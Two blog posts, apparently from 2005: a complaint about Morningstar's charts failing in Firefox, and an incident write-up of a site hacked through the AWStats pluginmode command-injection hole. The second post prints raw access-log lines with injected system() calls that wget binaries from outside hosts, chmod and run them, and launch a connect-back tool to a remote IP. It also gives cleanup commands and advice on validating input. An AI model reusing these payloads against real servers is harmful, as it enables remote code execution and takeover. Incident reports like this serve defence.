So, I’ve emailed joe@morningstar.com about a javascript bug that I’m experience in FireFox on MorningStar’s “Charts & Returns” web page: notice you can’t click on the tabs for each timeframe of the Chart image (this only happens in mozilla-based browsers).

First time I emailed joe@morningstar.com, he didn’t reply (I even sent him a link to the ever-so-simple fix I created and documented to make it work. After finding other bugs with MorningStar’s web site, I emailed joe@morningstar.com again…this time he replied, and said “We only support Internet Explorer”…well that’s just not good enough Joe! We, the savvy, use FireFox…and some of us even use Linux!! (imagine that, not using Microsoft products at all!!).

It’s about time you, Joe@Morningstar.com, get with the program, and start supporting mozilla-based browsers on your web site, after all it’s two lines of javascript you need to have your engineers fix to get a major feature of the web site (charting) to work. It’s reawlly not that hard. As a web developer myself, I cannot stress how you need to support, Safari, IE 4+, and mozilla-based browsers.

I’ve been using MorningStar for quite some time, and sware by it. I’ve told my mom (and countless co-workers and friends) who NEVER uses the Internet about it, and she even loves the site (and of course, yes, I got her using FireFox too) - that’s two of us Joe@MorningStar.com who can’t use your web site.

I’m afraid though, that I’m going to have to start recommending Yahoo Finance to my avid readers and friends. As they are a REAL Internet company, who sees the value in supporting alternative browsers to that piece-of-crap you’re so happy to use Joe@morningstar.com.

By the way, if you’re a fellow FireFox user, or simply “down with the cause…” shoot Joe an email. Incase you didn’t catch it, his email is: joe@morningstar.com

Thank you!
Anthony

Updated: Awstats 6.4 fixes even more security holes. Please upgrade to 6.4

One of my sites got hacked on Feb. 1, 2005, they changed the index.html and put “Simiens Crew 2005, Enquanto Houver Fome Morte Guerra Simiens Existira”

I’ve heard people suspect both PHP vulnerabiltiy and Awstats, both of which I’m using.

I’m using PHP Version 4.3.10 and Advanced Web Statistics 6.1 (build 1.751) (awstats)

I just checked the awstats homepage:

“Warning, a security hole was recently found in AWStats versions from 5.0 to 6.2 when AWStats is used as a CGI: A remote user can execute arbitrary commands on your server using permissions of your web server user (in most cases user “nobody”). If you use AWStats with another version or with option AllowToUpdateStatsFromBrowser to 0, you are safe. If not, it is highly recommanded to update to 6.3 version that fix this security hole.”

http://awstats.sf.net

Here’s some more info, and how I traced it down to awstats…

Here’s an excerpt from my clsearch.org log file:

tt.txt is a binary, which they ran (no idea what it
did)

system(”cd%20/tmp;wget%20protus.com.br/tt.txt;chmod%2077
7%20tt.txt;./tt.txt);

and dc.zip is also a binary they download and ran:

system(”wget%20gotmoney.100free.com/dc.zip”);

An email to my provider: You also have several hacked instances on your server in /tmp, most of which are binaries, two of which are perl scripts. One of the perl scripts attempts to connect an irc server, the same server that the people who hacked my site have a channel on #simiens. I couldn’t uncompress dc.zip (which was download in my log files, but I suspect dc.pl is what it contained - who knows what else, as it was an executable binary).

Some other nefarious things in /tmp on Neureal’s server:

brk2
cgi
ct
ct.1
dc.pl
index.html (contains a meta-refresh to some japanese online shopping site )
nbot.pl
r0nin

(The source for the two Perl scripts can be found here)

To find exploitable awstats configurarion files:
find . -name awstats*.conf | xargs cat | grep ‘AllowToUpdateStatsFromBrowser=1′

Replace all those instances so it’s set to 0 instead,
otherwise your customers will be exposed, until you
upgrade awstats.

Traverse the ./logs directory looking for exploits in the log files (67.169.x.x is my own ip, we’ll weed those out with grep -v):

find . -name “*.gz” | xargs zcat | grep awstats.pl | grep -v 67.169.x.x | less
find . -name awstats*.conf | xargs cat | grep ‘AllowToUpdateStatsFromBrowser=1′

Here’s the attack as it happened in my log file:

200.158.37.192 - - [29/Jan/2005:13:57:05 -0500] “GET /cgi-bin/awstats.pl?pluginmode=:system(”/bin/ls”); HTTP/1.1″ 200 3294 “-” “Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)”
200.158.37.192 - - [29/Jan/2005:13:57:11 -0500] “GET /cgi-bin/awstats.pl?pluginmode=:system(”uname%20-a”); HTTP/1.1″ 200 3302 “-” “Mozilla/4
.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)”
200.158.37.192 - - [29/Jan/2005:13:57:33 -0500] “GET /cgi-bin/awstats.pl?pluginmode=:system(”cd%20/tmp;wget%20protus.com.br/tt.txt;chmod%2077
7%20tt.txt;./tt.txt”); HTTP/1.1″ 200 3207 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)”
200.158.37.192 - - [29/Jan/2005:13:58:07 -0500] “GET /cgi-bin/awstats.pl?pluginmode=:system(”cd%20/tmp;ls”); HTTP/1.1″ 200 6902 “-” “Mozilla
/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)”
200.158.37.192 - - [29/Jan/2005:13:58:13 -0500] “GET /cgi-bin/awstats.pl?pluginmode=:system(”wget”); HTTP/1.1″ 200 3302 “-” “Mozilla/4.0 (co
mpatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)”
200.158.37.192 - - [29/Jan/2005:13:58:32 -0500] “GET /cgi-bin/awstats.pl?pluginmode=:system(”cd%20/tmp;wget%20protus.com.br/tt.txt;chmod%2077
7%20tt.txt;./tt.txt); HTTP/1.1″ 200 3273 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)”
200.158.37.192 - - [29/Jan/2005:13:58:40 -0500] “GET /cgi-bin/awstats.pl?pluginmode=:system(”cd%20/tmp;wget%20protus.com.br/tt.txtt); HTTP/1.
1″ 200 3273 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)”
200.158.37.192 - - [29/Jan/2005:13:58:43 -0500] “GET /cgi-bin/awstats.pl?pluginmode=:system(”cd%20/tmp;wget%20protus.com.br/tt.txt); HTTP/1.1
” 200 3273 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)”
200.158.37.192 - - [29/Jan/2005:13:58:53 -0500] “GET /cgi-bin/awstats.pl?pluginmode=:system(”id”); HTTP/1.1″ 200 3272 “-” “Mozilla/4.0 (comp
atible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)”
200.158.37.192 - - [29/Jan/2005:13:59:02 -0500] “GET /cgi-bin/awstats.pl?pluginmode=:system(”wget%20protus.com.br/tt.txt”); HTTP/1.1″ 200 32
15 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)”
200.158.37.192 - - [29/Jan/2005:13:59:10 -0500] “GET /cgi-bin/awstats.pl?pluginmode=:system(”chmod%20777%20tt.txt”); HTTP/1.1″ 200 3215 “-”
“Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)”
200.158.37.192 - - [29/Jan/2005:13:59:15 -0500] “GET /cgi-bin/awstats.pl?pluginmode=:system(”./tt.txt”); HTTP/1.1″ 200 3293 “-” “Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)”
200.158.37.192 - - [29/Jan/2005:13:59:47 -0500] “GET /cgi-bin/awstats.pl?pluginmode=:system(”wget%20gotmoney.100free.com/dc.zip”); HTTP/1.1″
200 3215 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)”
200.158.37.192 - - [29/Jan/2005:13:59:52 -0500] “GET /cgi-bin/awstats.pl?pluginmode=:system(”chmod%20777%20dc.zip”); HTTP/1.1″ 200 3215 “-”
“Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)”
200.158.37.192 - - [29/Jan/2005:14:00:32 -0500] “GET /cgi-bin/awstats.pl?pluginmode=:system(”./dc.zip%20200.204.170.225%206262″); HTTP/1.1″
200 3327 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)”
200.158.37.192 - - [29/Jan/2005:14:01:10 -0500] “GET /cgi-bin/awstats.pl?pluginmode=:system(”./dc.zip%20200.204.170.225%206262″); HTTP/1.1″
200 3334 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)”
200.158.37.192 - - [29/Jan/2005:14:01:46 -0500] “GET /cgi-bin/awstats.pl?pluginmode=:system(”./dc.zip%20200.204.170.225%205050″); HTTP/1.1″
200 3334 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)”
200.158.37.192 - - [29/Jan/2005:14:02:52 -0500] “GET /cgi-bin/awstats.pl?pluginmode=:system(”./dc.zip%20www.asianashop.com%206262″); HTTP/1.
1″ 200 3334 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)”

REMEMBER: Always check user input when you’re coding. Restrict it to only what you deem acceptable input, ie - if it’s a phone number, use a regexp to weed out everything but digits for example in Perl:

if ($phone =~ m|^\d{3}-\d{3}-\d{4}$|g) { phone ok; }

Obviously, international phone numbers won’t work, but you get the idea. Same goes for ANYTHING you pass to the system() command, which is how they hacked this server.

This stresses the point of also keeping your software (hopefully it’s open source) up-to-date. As open source software gets discovered and patched overnight, sometimes within hours of discovery. Just try to get a corporate conglomerate to “fix” their bug and have it available to you in that amount of time (They’ll even throw in a new licensing fee in order for you to get the fix). :-)

If anyone knows how to disassemble and executable to find out what it does, you can find their code here (beware, I wouldn’t run it on my machine).